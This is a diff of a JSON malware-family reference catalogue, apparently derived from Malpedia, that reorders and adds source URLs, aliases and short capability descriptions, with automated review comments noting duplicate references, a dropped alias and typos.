+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus"
 ],
 "synonyms": [],
 "type": []
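Review bot: The new-side refs of the BlackMatter entry still list the same Microsoft post twice, once as `https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself` and once with a trailing slash, so any consumer that deduplicates references by exact string will count one source as two; keep a single form. The same with/without-slash pair appears in the BLISTER entry's refs in the last hunk of this chunk, which continues past the end of the view. The replacement description also reads `changes the desktop wallpaper and created a ransom note`, which should be `creates a ransom note`. If this cluster is regenerated from an upstream feed, both fixes belong in the generator's normalization step rather than in the committed JSON.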
@@ -15790,13 +16503,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat",
- "http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html",
- "https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware",
+ "https://github.com/FarisCode511/BlackNET/",
 "https://labs.k7computing.com/?p=21365",
 "https://github.com/BlackHacker511/BlackNET/",
- "https://github.com/mave12/BlackNET-3.7.0.1",
 "https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/",
- "https://github.com/FarisCode511/BlackNET/"
+ "http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html",
+ "https://github.com/mave12/BlackNET-3.7.0.1",
+ "https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware"
 ],
 "synonyms": [],
 "type": []
@@ -15822,10 +16535,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
 "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/"
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/"
 ],
 "synonyms": [
 "Kaptoxa",
@@ -15843,9 +16556,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackremote",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/",
 "https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/",
- "https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/"
+ "https://asec.ahnlab.com/en/56405/",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/"
 ],
 "synonyms": [
 "BlackRAT"
@@ -15872,8 +16586,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrouter",
- "https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/legitimate-application-anydesk-bundled-with-new-ransomware-variant/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/legitimate-application-anydesk-bundled-with-new-ransomware-variant/",
+ "https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/"
 ],
 "synonyms": [
 "BLACKHEART"
@@ -15888,8 +16602,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackruby",
- "https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware",
- "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/"
+ "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/",
+ "https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware"
 ],
 "synonyms": [],
 "type": []
@@ -15903,10 +16617,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades",
 "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/",
- "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
- "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/",
 "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/",
- "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga"
+ "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
+ "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/",
+ "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html"
 ],
 "synonyms": [],
 "type": []
@@ -15940,13 +16654,27 @@
 "uuid": "58701e4d-87aa-45a5-adfd-9b20f50fea91",
 "value": "BlackSoul"
 },
+ {
+ "description": "According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksuit",
+ "https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/",
+ "https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b73202ea-e636-4e70-91b1-f29c1db4cbb1",
+ "value": "BlackSuit (Windows)"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackworm_rat",
- "https://github.com/BlackHacker511/BlackWorm",
 "https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-malware-team-uses-blackworm-for-attacks.html",
+ "https://github.com/BlackHacker511/BlackWorm",
 "https://www.fidelissecurity.com/threatgeek/archive/down-h-w0rm-hole-houdinis-rat/"
 ],
 "synonyms": [],
@@ -15969,22 +16697,24 @@
 "value": "BleachGap"
 },
 {
- "description": "According to SentinelOne, this RAT can gather and transmit a defined set of system features, create/terminate/manipulate processes and files, and has self-updating and deletion capability.",
+ "description": "BLINDINGCAN is a remote access trojan that communicates with its C&C server via HTTP(S).\r\nIt uses a (custom) RC4 or AES for encryption and decryption of its configuration and network traffic. \r\nIt sends information about the victim's environment, like computer name, IP, Windows product name and processor name.\r\nIt supports around 30 commands that include operations on the victim\u2019s filesystem, basic process management, command line execution, file exfiltration, configuration update, and the download and execution of additional payloads from the attackers' C&C. The commands are indexed by 16-bit integers, starting with the index 0x2009 and going incrementally up to 0x2057, with some indicis being skipped. 
\r\nIt uses various parameter names in its HTTP POST requests, mostly associated with web servers running bulletin board systems, like bbs, article, boardid, s_board, page, idx_num, etc.\r\nIt contains specific RTTI symbols like \".?AVCHTTP_Protocol@@\", \".?AVCFileRW@@\" or \".?AVCSinSocket@@\".\r\nBLINDINGCAN RAT is a flagship payload deployed in many Lazarus attacks, especially in the Operation DreamJob campaigns happening in 2020-2022.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan",
- "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
- "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
- "https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/",
 "https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a",
- "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/",
 "https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a",
 "https://www.hvs-consulting.de/lazarus-report/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
+ "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/",
+ "https://www.cisa.gov/news-events/analysis-reports/ar20-232a",
+ "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/"
 ],
 "synonyms": [
- "DRATzarus RAT"
+ "AIRDRY",
+ "ZetaNile"
 ],
 "type": []
 },
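Review bot: The synonyms change for BLINDINGCAN replaces `"DRATzarus RAT"` with `"AIRDRY"` and `"ZetaNile"` instead of adding to it, so any consumer already correlating on the DRATzarus alias silently loses that match; unless the old alias was wrong, keep it alongside the new ones, `"AIRDRY", "DRATzarus RAT", "ZetaNile"`. The new-side refs also cite the same CISA analysis report under two hosts, `https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a` and `https://www.cisa.gov/news-events/analysis-reports/ar20-232a`; the first appears to be the legacy address of the second, so one of them should go. The new description carries the typo `indicis` for `indices`. If this entry is regenerated from an upstream feed, these fixes belong upstream or in the generator rather than in the committed JSON.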
@@ -15998,8 +16728,8 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindtoad",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/",
 "https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html",
- "https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf",
- "https://content.fireeye.com/apt/rpt-apt38"
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -16012,20 +16742,22 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blister",
- "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
- "https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
- "https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign",
- "https://redcanary.com/blog/intelligence-insights-january-2022/",
 "https://twitter.com/MsftSecIntel/status/1522690116979855360",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
 "https://elastic.github.io/security-research/malware/2022/05/02.blister/article/",
 "https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-2/",
- "https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-1/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
+ "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
+ 
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://redcanary.com/blog/intelligence-insights-january-2022/",
+ "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
+ "https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://security-labs.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign",
+ "https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
+ "https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-1/"
 ],
 "synonyms": [
 "COLORFAKE"
@@ -16076,15 +16808,54 @@
 "uuid": "3dcfef7b-d657-4ac5-b738-ef793237274b",
 "value": "BLUEHAZE"
 },
+ {
+ "description": "Malware family used to deliver follow up payloads, variants using Microsoft Graph API and Google Web Apps have been observed.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluelight",
+ "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9c5ec440-2bb8-4485-9811-f2fb52cf76e5",
+ "value": "BLUELIGHT"
+ },
+ {
+ "description": "This family contains the BlueNoroff toolkit used for SWIFT manipulation, as used by the Lazarus activity cluster also referred to as BlueNoroff.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluenoroff",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "862e9c13-dde6-473e-a816-a7d7043bf73c",
+ "value": "BlueNoroff"
+ },
+ {
+ "description": "According to AhnLab, BlueShell is a backdoor malware developed in Go language, published on Github, and it supports Windows, Linux, and Mac operating systems. Currently, the original Github repository is presumed to have been deleted, but the BlueShell source code can still be obtained from other repositories. 
It features an explanatory ReadMe file in Chinese, indicating the possibility that the creator is a Chinese user.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blueshell",
+ "https://asec.ahnlab.com/ko/56715/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "91d441a6-4244-43a2-9b96-354a2df63a4e",
+ "value": "BlueShell"
+ },
 {
 "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluesky",
- "https://unit42.paloaltonetworks.com/bluesky-ransomware/",
- "https://yoroi.company/research/dissecting-bluesky-ransomware-payload/",
 "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/",
- "https://cloudsek.com/technical-analysis-of-bluesky-ransomware/"
+ "https://yoroi.company/research/dissecting-bluesky-ransomware-payload/",
+ "https://cloudsek.com/technical-analysis-of-bluesky-ransomware/",
+ "https://unit42.paloaltonetworks.com/bluesky-ransomware/"
 ],
 "synonyms": [],
 "type": []
@@ -16097,8 +16868,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluether",
- "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
- "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf"
+ "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf"
 ],
 "synonyms": [
 "CAPGELD"
@@ -16113,10 +16884,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blustealer",
- "https://twitter.com/GoSecure_Inc/status/1437435265350397957",
- "https://www.gosecure.net/blog/2021/09/22/gosecure-titan-labs-technical-report-blustealer-malware-threat/",
- "https://blog.minerva-labs.com/a-new-blustealer-loader-uses-direct-syscalls-to-evade-edrs",
 "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://twitter.com/GoSecure_Inc/status/1437435265350397957",
+ "https://blog.minerva-labs.com/a-new-blustealer-loader-uses-direct-syscalls-to-evade-edrs",
+ "https://www.gosecure.net/blog/2021/09/22/gosecure-titan-labs-technical-report-blustealer-malware-threat/",
 "https://decoded.avast.io/anhho/blustealer/",
 "https://blogs.blackberry.com/en/2021/10/threat-thursday-blustealer-infostealer"
 ],
@@ -16159,8 +16930,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bobik",
- "https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/",
- "https://decoded.avast.io/martinchlumecky/bobik/"
+ "https://decoded.avast.io/martinchlumecky/bobik/",
+ "https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/"
 ],
 "synonyms": [],
 "type": []
@@ -16199,9 +16970,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek",
+ "https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt",
 "https://securelist.com/kbot-sometimes-they-come-back/96157/",
- "http://www.cert.pl/news/11379",
- "https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt"
+ "http://www.cert.pl/news/11379"
 ],
 "synonyms": [
 "KBOT"
@@ -16211,6 +16982,26 @@
 "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18",
 "value": "Bolek"
 },
+ {
+ "description": "BookCodesRAT is a remote access trojan that uses HTTP(S) for communication. It supports around 25 commands that include operations on the victim\u2019s filesystem, basic process management and the download and execution of additional tools from the attacker\u2019s arsenal. They are indexed by 32-bit integers, starting with the value 0x97853646. \r\n\r\nBookCodesRAT uses mostly compromised South Korean web servers for the C&C traffic and is usually deployed against South Korean targets.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat",
+ "https://www.boho.or.kr/filedownload.do?attach_file_seq=2612&attach_file_id=EpF2612.pdf",
+ "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/",
+ "https://www.boho.or.kr/filedownload.do?attach_file_seq=2452&attach_file_id=EpF2452.pdf",
+ "https://vblocalhost.com/uploads/VB2021-Lee-etal.pdf",
+ "https://www.welivesecurity.com/2020/11/16/lazarus-supply-chain-attack-south-korea/",
+ "https://vblocalhost.com/uploads/VB2021-Park.pdf"
+ ],
+ "synonyms": [
+ "BookCodesTea"
+ ],
+ "type": []
+ },
+ "uuid": "433b9a1c-dd2a-4d2b-b469-47b40fc6c196",
+ "value": "BookCodes RAT"
+ },
 {
 "description": "This in .Net written malware is a classic information stealer. It can collect various information and can be depoyed in different configurations: \"The full-featured version of the malware can log keystrokes, collect profile files of Mozilla Firefox and Google Chrome browsers, record sound from the microphone, grab desktop screenshots, capture photo from the webcam, and collect information about the version of the operation system and installed anti-virus software.\" (ESET)\r\nThis malware has been active since at least 2012.",
 "meta": {
@@ -16242,9 +17033,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.boombox",
+ "https://cert.pl/posts/2023/04/kampania-szpiegowska-apt29/",
 "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
- "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/",
- "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/"
+ "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/",
+ "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
 ],
 "synonyms": [],
 "type": []
@@ -16253,13 +17045,13 @@
 "value": "BOOMBOX"
 },
 {
- "description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.",
+ "description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate \u2018Dwrite.dll\u2019 provided by the Microsoft DirectX Typography Services. The application loads the \u2018gdi\u2019 library, which loads the \u2018gdiplus\u2019 library, which ultimately loads \u2018Dwrite\u2019. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf"
+ "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html"
 ],
 "synonyms": [],
 "type": []
@@ -16272,8 +17064,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck",
- "https://content.fireeye.com/apt/rpt-apt38",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/",
+ "https://content.fireeye.com/apt/rpt-apt38"
 ],
 "synonyms": [
 "MBRkiller"
@@ -16288,8 +17080,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.boratrat",
- "https://blog.cyble.com/2022/03/31/deep-dive-analysis-borat-rat/",
 "https://www.bleepingcomputer.com/news/security/new-borat-remote-access-malware-is-no-laughing-matter/",
+ "https://blog.cyble.com/2022/03/31/deep-dive-analysis-borat-rat/",
 "https://blogs.blackberry.com/en/2022/04/threat-thursday-boratrat"
 ],
 "synonyms": [],
@@ -16303,9 +17095,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.borr",
- "https://telegra.ph/Borr-Malware-02-04",
+ "https://twitter.com/ViriBack/status/1222704498923032576",
 "https://github.com/onek1lo/Borr-Stealer",
- "https://twitter.com/ViriBack/status/1222704498923032576"
+ "https://telegra.ph/Borr-Malware-02-04"
 ],
 "synonyms": [],
 "type": []
@@ -16345,8 +17137,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok",
 "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html"
+ "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/"
 ],
 "synonyms": [],
 "type": []
@@ -16368,21 +17160,21 @@
 "value": "BRAIN"
 },
 {
- "description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim’s networks.",
+ "description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim\u2019s networks.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2",
- "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
 "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
- "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
 "https://www.secureworks.com/research/threat-profiles/nickel-academy",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
 "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/",
- "https://www.us-cert.gov/ncas/alerts/TA18-149A",
+ "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2",
 "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
- 
"https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2",
+ "https://www.us-cert.gov/ncas/alerts/TA18-149A"
 ],
 "synonyms": [
 "SORRYBRUTE"
@@ -16432,7 +17224,7 @@
 "value": "BreachRAT"
 },
 {
- "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n",
+ "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader"
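Review bot: The rewritten breakthrough_loader description still lacks the placeholder tokens it refers to: `gate.php?hwid=&os=&build=1.0.0&cpu=8` has empty `hwid=` and `os=` values, and the following `\r\n\r\n is one of:` has no subject, which looks like angle-bracketed tokens were stripped as markup at import time. The commit only re-escapes the Cyrillic path segment and leaves that sentence broken, so the list of Windows version strings that follows has nothing it visibly belongs to. Placeholders that survive HTML stripping would fix the reading, e.g. `gate.php?hwid=[hwid]&os=[os]&build=1.0.0&cpu=8` and `[os] is one of:`; if this file is generated, the repair belongs in the generator or upstream description rather than a hand edit here.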
@@ -16449,8 +17241,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab",
 "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html"
+ "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -16517,9 +17309,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader",
+ "https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/",
